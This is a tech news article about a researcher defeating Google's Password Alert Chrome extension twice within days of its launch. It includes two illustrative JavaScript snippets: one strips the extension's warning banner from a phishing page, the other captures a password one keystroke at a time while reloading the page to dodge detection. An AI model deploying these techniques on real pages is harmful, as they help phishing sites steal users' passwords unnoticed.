Google needs to go back to the drawing board, as Password Alert is hacked in 24 hours

Well, that didn’t take very long.

Not even a day after its debut, a proof-of-concept exploit has been posted that defeats Password Alert, the new Chrome extension at the heart of Google’s push to protect people’s passwords from phishing attempts.

“It beggars belief,” said Paul Moore, an information security consultant at UK-based Urity Group who wrote the exploit. “The suggestion that it offers any real level of protection is laughable.”

The Password Alert extension was supposed to keep an active eye on phishing attempts by scanning databases of known threats and checking them against any page that asks you to log in with your Google account.

Some were hoping the extension could usher in a whole range of companies offering similar protections, especially those like Facebook and Twitter, whose logins are used to sign in to destinations all across the web.

But simply by removing the JavaScript block that controls the warning banner, which pops up when a fraudulent site is detected, Moore was able to fool the extension into treating his mocked-up phishing portal as a legitimate resource.
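Moore’s actual exploit code isn’t reproduced in this story, but the gist of that first bypass is easy to sketch in a few lines of page JavaScript. Treat the following as a hypothetical illustration, and the banner selector in particular as an assumption:

```js
// Hypothetical sketch of the first bypass: the phishing page polls the DOM
// and deletes the extension's injected warning banner before the victim
// has a chance to read it. The id below is an assumption; a real attack
// would first inspect the markup Password Alert actually injects.
setInterval(function () {
  var banner = document.querySelector('#password-alert-warning'); // hypothetical id
  if (banner) {
    banner.remove(); // the warning vanishes almost as soon as it is drawn
  }
}, 5); // poll every few milliseconds
```

Because the warning is just another element on the page, the page’s own scripts can delete it as quickly as the extension can draw it.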

Google responded to the problem by quickly updating the extension to block that specific route of entry, but just a day later, Moore returned with a second crack that circumvented the patched version just as easily.

This iteration works by refreshing the page after every character is typed, fooling the warning system into thinking the full password was never entered in the first place.
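Again, the exploit itself isn’t reprinted here, but the trick might look something like the sketch below: capture one keystroke at a time, stash the fragment collected so far, and reload before the extension’s typing buffer ever holds more than a single character. The input selector and the use of sessionStorage are both illustrative assumptions:

```js
// Hypothetical sketch of the second bypass: record one keystroke, then
// reload the page so the extension's per-page keystroke buffer never
// accumulates the full password. sessionStorage stands in for wherever
// a real phishing page would send the captured fragment.
var field = document.querySelector('#fake-password'); // hypothetical input
field.addEventListener('keydown', function (event) {
  if (event.key.length === 1) { // a single printable character
    var captured = (sessionStorage.getItem('captured') || '') + event.key;
    sessionStorage.setItem('captured', captured);
    event.preventDefault(); // keep the character out of the visible field
    location.reload(); // wipes the extension's record of what was typed
  }
});
```

From the extension’s point of view, no single page load ever sees more than one character, so the full password appears never to have been entered at all.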

Luckily for the rest of us, Moore is on the good guys’ side of this fight, and was more than willing to rub Google’s nose in its mistakes before widely publishing the details of his work so the whitehat community could put together a temporary fix.

If you ask us, Google probably needs to hit the whiteboard a little harder before it rolls out crucial services like this, lest all our passwords end up in the hands of the enemy first.

Chris Stobing